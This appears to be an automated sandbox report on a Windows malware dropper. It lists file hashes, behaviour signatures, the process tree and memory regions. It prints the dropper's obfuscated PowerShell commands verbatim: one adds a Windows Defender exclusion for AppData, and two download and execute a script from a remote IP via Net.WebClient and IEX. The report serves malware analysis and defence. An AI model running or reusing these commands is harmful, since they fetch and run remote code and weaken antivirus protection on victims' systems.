Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    117s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/09/2022, 19:56

General

  • Target

    3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe

  • Size

    979KB

  • MD5

    c13f1a8cf97ee2f8c3c782e7e8bb717f

  • SHA1

    02c0218bca2ce9801860b1b0793d8631d09b9933

  • SHA256

    3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea

  • SHA512

    79073289d8e9b902cbbb895164b7c1e06f18a8367d339b3f3d681170306882de436bcdb9eb3b73c69d4869e40f98138ad8b0d89e1709d2158dfef028b92b4f08

  • SSDEEP

    24576:gYrxUgRM5Ybc9bKvu6DPiCskNxZsTB3O6vJV9XKEYoSNd64X:g1Cgb+DPitklsTB3vJLXY5Nd6q

Score
10/10
upx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://31.41.244.231/AVAVA/WAW/APPDATA/go.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://31.41.244.231/AVAVA/WAW/Documents/go.oo

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe
    "C:\Users\Admin\AppData\Local\Temp\3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1368
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\Offs\KillDuplicate.cmd" "C:\Users\Admin\AppData\Roaming\Offs" "3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe""
      2⤵
        PID:3060
      • C:\Users\Admin\AppData\Roaming\Offs\Offer.exe
        "C:\Users\Admin\AppData\Roaming\Offs\Offer.exe"
        2⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3116
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAJwAgACAALQBGAG8AcgBjAGUAOwA=
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3836
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{BINGO}(N{BINGO}{BINGO}e{BINGO}w-{BINGO}Ob{BINGO}{BINGO}je{BINGO}{BINGO}c{BINGO}t N{BINGO}{BINGO}e{BINGO}t.W{BINGO}e';$c4='b{BINGO}{BINGO}Cli{BINGO}{BINGO}en{BINGO}{BINGO}t{BINGO}).Do{BINGO}{BINGO}wn{BINGO}{BINGO}l{BINGO}o';$c3='a{BINGO}dS{BINGO}{BINGO}t{BINGO}ri{BINGO}{BINGO}n{BINGO}g{BINGO}(''h{BINGO}tt{BINGO}p:/{BINGO}/31.41.244.231/AVAVA/WAW/APPDATA/go.oo''){BINGO}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{BINGO}',''); IEX $TC |IEX
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1988
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{BINGO}(N{BINGO}{BINGO}e{BINGO}w-{BINGO}Ob{BINGO}{BINGO}je{BINGO}{BINGO}c{BINGO}t N{BINGO}{BINGO}e{BINGO}t.W{BINGO}e';$c4='b{BINGO}{BINGO}Cli{BINGO}{BINGO}en{BINGO}{BINGO}t{BINGO}).Do{BINGO}{BINGO}wn{BINGO}{BINGO}l{BINGO}o';$c3='a{BINGO}dS{BINGO}{BINGO}t{BINGO}ri{BINGO}{BINGO}n{BINGO}g{BINGO}(''h{BINGO}tt{BINGO}p:/{BINGO}/31.41.244.231/AVAVA/WAW/Documents/go.oo''){BINGO}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{BINGO}',''); IEX $TC |IEX
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3916

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      21b2515b8ce8a500003c74edc982a17b

      SHA1

      17edc69d4cf122da08d0dd7582626ae2379d4c60

      SHA256

      df4a9df4b79a2f364b99f24f682e0b9cd96ed7c93a56805bfd0dfd5d1330f66f

      SHA512

      97b9c3766126f2c5ac28554b880ffdeddc9eebfff903101c25ca58bcbce0b0e17a7e5fc15804ef2064a67b5dd009c3b339bd9bf9f9b56f591876d920a5d4320c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      0b9b16e9ebb1c0f5a966ce4840d8a694

      SHA1

      ed21e94ad30fc5177d1c34a7411ef3d43b1096a9

      SHA256

      6ada979d402c17a05fe93c3c17c2a5e692214fa2bb6a7938db35d47b062946cb

      SHA512

      ef6ad9aa5820c216879818461719da49d8f49b581a83b83b61def1a320ee219e3d760fc1390dc93e1492cf98ddf9cc7a449b766855e0f64c19b2e8fd3031b7dc

    • C:\Users\Admin\AppData\Roaming\Offs\Offer.exe

      Filesize

      7KB

      MD5

      fa4300da126da4a4ecf2c0d82dbe92f4

      SHA1

      3acbae61f796e7fad05ee9a875a9d3cbd6ec3996

      SHA256

      1ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5

      SHA512

      d6922c07a9fc04d7c24ffdafd77651996224581b41f2d063a25d5fe1b786a89cf04b88447924f6fe11e9766b08ac97b1f50144a29c1d89d8198b68262c1ae6c9

    • C:\Users\Admin\AppData\Roaming\Offs\Offer.exe

      Filesize

      7KB

      MD5

      fa4300da126da4a4ecf2c0d82dbe92f4

      SHA1

      3acbae61f796e7fad05ee9a875a9d3cbd6ec3996

      SHA256

      1ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5

      SHA512

      d6922c07a9fc04d7c24ffdafd77651996224581b41f2d063a25d5fe1b786a89cf04b88447924f6fe11e9766b08ac97b1f50144a29c1d89d8198b68262c1ae6c9

    • memory/1368-133-0x0000000000400000-0x0000000000434000-memory.dmp

      Filesize

      208KB

    • memory/1368-132-0x0000000000400000-0x0000000000434000-memory.dmp

      Filesize

      208KB

    • memory/1988-147-0x0000000005B40000-0x0000000005BA6000-memory.dmp

      Filesize

      408KB

    • memory/1988-144-0x0000000004C50000-0x0000000004C86000-memory.dmp

      Filesize

      216KB

    • memory/1988-151-0x0000000006640000-0x000000000665A000-memory.dmp

      Filesize

      104KB

    • memory/3116-155-0x0000000000400000-0x0000000000407000-memory.dmp

      Filesize

      28KB

    • memory/3116-139-0x0000000000400000-0x0000000000407000-memory.dmp

      Filesize

      28KB

    • memory/3836-156-0x0000000007340000-0x000000000734A000-memory.dmp

      Filesize

      40KB

    • memory/3836-157-0x0000000007560000-0x00000000075F6000-memory.dmp

      Filesize

      600KB

    • memory/3836-152-0x0000000006530000-0x0000000006562000-memory.dmp

      Filesize

      200KB

    • memory/3836-153-0x000000006FF00000-0x000000006FF4C000-memory.dmp

      Filesize

      304KB

    • memory/3836-154-0x0000000006510000-0x000000000652E000-memory.dmp

      Filesize

      120KB

    • memory/3836-148-0x0000000005A40000-0x0000000005AA6000-memory.dmp

      Filesize

      408KB

    • memory/3836-146-0x0000000005200000-0x0000000005222000-memory.dmp

      Filesize

      136KB

    • memory/3836-158-0x0000000007500000-0x000000000750E000-memory.dmp

      Filesize

      56KB

    • memory/3836-159-0x0000000007600000-0x000000000761A000-memory.dmp

      Filesize

      104KB

    • memory/3836-160-0x0000000007540000-0x0000000007548000-memory.dmp

      Filesize

      32KB

    • memory/3916-145-0x00000000057E0000-0x0000000005E08000-memory.dmp

      Filesize

      6.2MB

    • memory/3916-150-0x0000000007E50000-0x00000000084CA000-memory.dmp

      Filesize

      6.5MB

    • memory/3916-149-0x0000000005420000-0x000000000543E000-memory.dmp

      Filesize

      120KB